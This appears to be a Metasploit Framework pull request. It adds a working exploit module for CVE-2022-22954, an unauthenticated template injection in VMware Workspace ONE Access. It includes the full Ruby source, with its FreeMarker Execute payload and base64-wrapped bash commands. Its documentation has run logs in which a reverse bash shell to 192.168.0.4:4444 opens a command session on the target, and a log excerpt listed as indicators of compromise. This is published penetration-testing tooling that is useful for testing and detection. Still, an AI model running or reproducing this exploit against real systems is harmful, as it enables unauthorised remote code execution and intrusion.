### PR TITLE
Add VMware Workspace ONE Access CVE-2022-22954

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -66,17 +66,27 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos
 verbose => true
 msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
 
-[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
+[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159'
 [*] Started reverse TCP handler on 127.0.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
+[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})}
 [+] The target is vulnerable.
 [*] Executing cmd/unix/reverse_bash (Unix Command)
-[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
-[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
+[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500
 
 id
 uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
 uname -a
 Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
+```
+
+## IOCs
+
+### `/opt/vmware/horizon/workspace/logs/greenbox_web.log`
+
+```
+[snip]
+2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f> <tenant_id: zt1myh6phvlz> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
+[snip]
 ```

--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -1,0 +1,82 @@
+## Vulnerable Application
+
+### Setup
+
+Follow [Installing and Configuring VMware Workspace ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be exploitable out of the box.
+
+1. Import `identity-manager-21.08.0.1-19010796_OVF10.ova`
+1. Boot the VM
+1. Hax
+
+[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+## Scenarios
+
+### VMware Workspace ONE Access 21.08.0.1
+
+```
+msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > options
+
+Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set rhosts 192.168.0.5
+rhosts => 192.168.0.5
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set lhost 192.168.0.4
+lhost => 192.168.0.4
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set reverselistenerbindaddress 127.0.0.1
+reverselistenerbindaddress => 127.0.0.1
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbose true
+verbose => true
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
+
+[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
+[+] The target is vulnerable.
+[*] Executing cmd/unix/reverse_bash (Unix Command)
+[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
+
+id
+uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
+uname -a
+Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -123,11 +123,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def ssti_uri
-    %w[/catalog-portal/ui/oauth/verify /catalog-portal/hub-ui/byob].sample
+    %w[
+      /catalog-portal/hub-ui
+      /catalog-portal/hub-ui/byob
+      /catalog-portal/ui
+      /catalog-portal/ui/oauth/verify
+    ].sample
   end
 
   def ssti_param
-    %w[deviceUdid deviceType].sample
+    %w[deviceType deviceUdid].sample
   end
 
 end

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'mr_me', # Discovery
-          'Sherlock Secure', # PoC
+          'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC
           'wvu' # Exploit and independent analysis
         ],
         'References' => [

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -112,6 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vhost' => rand_text_alphanumeric(8..16),
       'vars_get' => {
         %w[code error].sample => rand_text_alphanumeric(8..16),
+        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html
         ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
       }
     }, 3.5)

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -1,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware Workspace ONE Access CVE-2022-22954',
+        'Description' => %q{
+          This module exploits CVE-2022-22954, an unauthenticated server-side
+          template injection (SSTI) in VMware Workspace ONE Access, to execute
+          shell commands as the "horizon" user.
+        },
+        'Author' => [
+          'mr_me', # Discovery
+          'Sherlock Secure', # PoC
+          'wvu' # Exploit and independent analysis
+        ],
+        'References' => [
+          ['CVE', '2022-22954'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],
+          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],
+          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],
+          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']
+          # https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
+        ],
+        'DisclosureDate' => '2022-04-06',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
+
+    return CheckCode::Unknown unless res
+    return CheckCode::Safe unless res.code == 400 && res.body.include?("device id: #{token}")
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"
+
+    vprint_status("Executing command: #{bash_cmd}")
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/catalog-portal/ui/oauth/verify'),
+      'vhost' => rand_text_alphanumeric(8..16),
+      'vars_get' => {
+        'error' => '',
+        'deviceUdid' => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
+      }
+    }, 3.5)
+  end
+
+end

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
 
     return CheckCode::Unknown unless ret
-    return CheckCode::Safe unless ret.include?("device id: #{token}")
+    return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)
 
     CheckCode::Vulnerable
   end
@@ -108,11 +108,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/catalog-portal/ui/oauth/verify'),
+      'uri' => normalize_uri(target_uri.path, ssti_uri),
       'vhost' => rand_text_alphanumeric(8..16),
       'vars_get' => {
-        'error' => '',
-        'deviceUdid' => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
+        'error' => rand_text_alphanumeric(8..16),
+        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
       }
     }, 3.5)
 
@@ -120,6 +120,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return '' unless res.code == 400 && res.body.include?('auth.context.invalid')
 
     res.body
+  end
+
+  def ssti_uri
+    %w[/catalog-portal/ui/oauth/verify /catalog-portal/hub-ui/byob].sample
+  end
+
+  def ssti_param
+    %w[deviceUdid deviceType].sample
   end
 
 end

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -82,10 +82,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
+    ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
 
-    return CheckCode::Unknown unless res
-    return CheckCode::Safe unless res.code == 400 && res.body.include?("device id: #{token}")
+    return CheckCode::Unknown unless ret
+    return CheckCode::Safe unless ret.include?("device id: #{token}")
 
     CheckCode::Vulnerable
   end
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Executing command: #{bash_cmd}")
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/catalog-portal/ui/oauth/verify'),
       'vhost' => rand_text_alphanumeric(8..16),
@@ -115,6 +115,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'deviceUdid' => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
       }
     }, 3.5)
+
+    return unless res
+    return '' unless res.code == 400 && res.body.include?('auth.context.invalid')
+
+    res.body
   end
 
 end

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, ssti_uri),
       'vhost' => rand_text_alphanumeric(8..16),
       'vars_get' => {
-        'error' => rand_text_alphanumeric(8..16),
+        %w[code error].sample => rand_text_alphanumeric(8..16),
         ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
       }
     }, 3.5)

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],
           ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],
           ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']
-          # https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
+          # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
         ],
         'DisclosureDate' => '2022-04-06',
         'License' => MSF_LICENSE,


### PR DESCRIPTION
```
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > info

       Name: VMware Workspace ONE Access CVE-2022-22954
     Module: exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-04-06

Provided by:
  mr_me
  Udhaya Prakash
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2022-22954, an unauthenticated server-side
  template injection (SSTI) in VMware Workspace ONE Access, to execute
  shell commands as the "horizon" user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-22954
  https://www.vmware.com/security/advisories/VMSA-2022-0011.html
  https://srcincite.io/advisories/src-2022-0005/
  https://github.com/sherlocksecurity/VMware-CVE-2022-22954
  https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) >
```